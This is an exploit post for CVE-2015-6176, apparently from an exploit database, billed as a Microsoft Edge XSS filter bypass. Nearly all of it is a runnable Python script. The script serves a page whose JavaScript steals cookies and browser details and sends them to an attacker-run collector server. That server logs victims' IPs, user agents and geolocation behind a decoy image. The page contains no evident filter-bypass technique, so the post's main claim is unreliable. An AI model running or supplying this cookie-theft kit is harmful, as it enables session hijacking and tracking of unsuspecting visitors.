# Titles: Microsoft Edge XSS Filter Bypass PoC # Author: nu11secur1ty # Date: 2025-07-18 # Vendor: Microsoft # Software: Microsoft Edge Browser # Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6176 ## Description This Proof of Concept (PoC) demonstrates an XSS (Cross-Site Scripting) vulnerability bypass in Microsoft Edge's XSS filter. The vulnerability allows attackers to inject and execute malicious JavaScript despite Edge's built-in XSS protection mechanisms. This PoC works by crafting an HTML page that steals user cookies and sends them to an attacker-controlled collector server, bypassing Edge's filter. The collector server displays a large sea picture as a decoy, while logging stolen cookies, IP addresses, user agents, timestamps, and approximate geographic locations. This vulnerability is categorized as medium severity due to the potential for session hijacking and unauthorized actions performed with stolen cookies. # STATUS: MEDIUM VULNERABILITY [+]Exploit: ```pyton #!/usr/bin/python # nu11secur1ty CVE-2015-6176 import http.server import socketserver import socket import threading from urllib import parse import requests import datetime PORT = 8080 COLLECTOR_PORT = 9000 # HTML page with extended XSS exploit that sends lots of info via Image GET to collector HTML_CONTENT = b"""<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>XSS Edge Bypass PoC</title> <script> window.onload = function() { try { var attackerServer = "http://{LOCAL_IP}:{COLLECTOR_PORT}/collect"; var cookies = document.cookie || ""; var url = window.location.href; var referrer = document.referrer; var language = navigator.language || ""; var platform = navigator.platform || ""; var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone || ""; var screenRes = screen.width + "x" + screen.height; var data = { cookie: cookies, url: url, referrer: referrer, language: language, platform: platform, timezone: timezone, screen: screenRes }; var query = Object.keys(data).map(function(k) { return encodeURIComponent(k) + "=" + encodeURIComponent(data[k]); }).join("&"); var img = new Image(); img.src = attackerServer + "?" + query; } catch(e) { console.error("Error sending data:", e); } }; </script> </head> <body> <h1 style="color:red;">XSS Edge Bypass PoC</h1> <p>If this alert appears, XSS is executed.</p> </body> </html> """ # Collector page with large sea picture and centered message (Unicode allowed) COLLECTOR_PAGE = """<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8" /> <title>Collected</title> <style> body { margin: 0; background: url('https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80') no-repeat center center fixed; background-size: cover; height: 100vh; display: flex; justify-content: center; align-items: center; color: white; font-family: Arial, sans-serif; font-size: 2em; text-shadow: 2px 2px 5px rgba(0,0,0,0.7); } </style> </head> <body> <div>Thank you for visiting the collector page 🌊</div> </body> </html> """ class ExploitHandler(http.server.SimpleHTTPRequestHandler): def do_GET(self): if self.path in ('/', '/index.html'): content = HTML_CONTENT.replace(b"{LOCAL_IP}", local_ip.encode()).replace(b"{COLLECTOR_PORT}", str(COLLECTOR_PORT).encode()) self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") self.send_header("Content-Length", str(len(content))) self.end_headers() self.wfile.write(content) else: self.send_error(404) class CollectorHandler(http.server.BaseHTTPRequestHandler): def do_GET(self): parsed_path = parse.urlparse(self.path) if parsed_path.path == "/collect": query = parse.parse_qs(parsed_path.query) cookie = query.get("cookie", [""])[0] url = query.get("url", [""])[0] referrer = query.get("referrer", [""])[0] language = query.get("language", [""])[0] platform = query.get("platform", [""])[0] timezone = query.get("timezone", [""])[0] screen = query.get("screen", [""])[0] ip = self.client_address[0] user_agent = self.headers.get("User-Agent", "Unknown") timestamp = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S") location = self.get_location(ip) if cookie: print(f"[{timestamp}] [+] Collected cookie: {cookie}") print(f" URL: {url}") print(f" Referrer: {referrer}") print(f" Language: {language}") print(f" Platform: {platform}") print(f" Timezone: {timezone}") print(f" Screen Resolution: {screen}") print(f" From IP: {ip}") print(f" User-Agent: {user_agent}") print(f" Location: {location}") print("-" * 50) # Save collected info to a file with open("collected_data.log", "a", encoding="utf-8") as f: f.write(f"[{timestamp}] Cookie: {cookie}\n") f.write(f" URL: {url}\n") f.write(f" Referrer: {referrer}\n") f.write(f" Language: {language}\n") f.write(f" Platform: {platform}\n") f.write(f" Timezone: {timezone}\n") f.write(f" Screen Resolution: {screen}\n") f.write(f" IP: {ip}\n") f.write(f" User-Agent: {user_agent}\n") f.write(f" Location: {location}\n") f.write("-" * 50 + "\n") self.send_response(200) self.send_header("Content-Type", "text/html; charset=utf-8") content = COLLECTOR_PAGE.encode('utf-8') self.send_header("Content-Length", str(len(content))) self.end_headers() self.wfile.write(content) else: self.send_error(404) def get_location(self, ip): # Use free IP info service; fallback gracefully if no internet try: resp = requests.get(f"https://ipinfo.io/{ip}/json", timeout=3) if resp.status_code == 200: data = resp.json() city = data.get("city", "") region = data.get("region", "") country = data.get("country", "") loc = data.get("loc", "") return f"{city}, {region}, {country} (coords: {loc})" except Exception: pass return "Location lookup failed or unavailable" def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] except Exception: ip = "127.0.0.1" finally: s.close() return ip def run_exploit_server(): with socketserver.TCPServer(("", PORT), ExploitHandler) as httpd: print(f"[*] Exploit server running at: http://{local_ip}:{PORT}/index.html") httpd.serve_forever() def run_collector_server(): with socketserver.TCPServer(("", COLLECTOR_PORT), CollectorHandler) as httpd: print(f"[*] Collector server listening for stolen cookies at: http://{local_ip}:{COLLECTOR_PORT}/collect") httpd.serve_forever() if __name__ == "__main__": local_ip = get_local_ip() try: print(f"[*] Your server IP is: {local_ip}") exploit_thread = threading.Thread(target=run_exploit_server, daemon=True) exploit_thread.start() run_collector_server() except KeyboardInterrupt: print("\n[!] Shutting down servers. Goodbye!") ``` # Video: [href](https://www.youtube.com/watch?v=T2YLrFsvXOc) # Source: [href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176) # Buy me a coffee if you are not ashamed: [href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY) # Time spent: 03:35:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>